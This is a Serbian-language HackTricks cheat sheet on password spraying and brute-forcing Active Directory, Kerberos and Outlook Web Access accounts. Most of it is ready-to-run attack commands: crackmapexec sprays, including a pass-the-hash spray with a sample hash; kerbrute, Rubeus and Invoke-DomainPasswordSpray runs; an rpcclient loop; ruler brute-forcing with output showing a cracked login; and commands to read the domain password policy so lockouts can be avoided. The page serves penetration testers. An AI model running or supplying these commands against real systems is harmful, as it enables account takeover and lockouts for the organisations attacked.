Password Spraying / Brute Force

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Password Spraying

Kada pronađete nekoliko validnih korisničkih imena možete probati najčešće lozinke (imajte na umu politiku lozinke okruženja) sa svakim otkrivenim korisnikom. Podrazumevano, minimalna dužina lozinke je 7.

Liste čestih korisničkih imena takođe mogu biti korisne: https://github.com/insidetrust/statistically-likely-usernames

Imajte na umu da možete blokirati neke naloge ako pokušate više pogrešnih lozinki (podrazumevano više od 10).

Dobijanje politike lozinke

Ako imate neke korisničke podatke ili shell kao korisnik domena možete dobiti politiku lozinke sa:

# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview

Eksploatacija sa Linuxa (ili sa svih)

  • Korišćenje crackmapexec:

crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
  • prskanje (možete naznačiti broj pokušaja kako biste izbegli blokade):

spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
  • Korišćenje kerbrute (python) - NEPREPORUČENO, PONEKAD NE RADI

python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
  • Sa modulom scanner/smb/smb_login u Metasploit-u:

  • Korišćenjem rpcclient-a:

# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done

Sa Windows-a

  • Sa Rubeus verzijom sa modulom za brute force:

# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
  • Sa Invoke-DomainPasswordSpray (Može generisati korisnike iz domena po podrazumevanim vrednostima i dobiće pravila za lozinke iz domena i ograničiti pokušaje prema njima):

Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
Invoke-SprayEmptyPassword

Brute Force

legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org

Outlook Web Access

Postoje višestruki alati za password spraying outlook.

Da biste koristili bilo koji od ovih alata, potrebna vam je lista korisnika i šifra / mala lista šifri za prskanje.

./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020

Google

Okta

Reference

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Last updated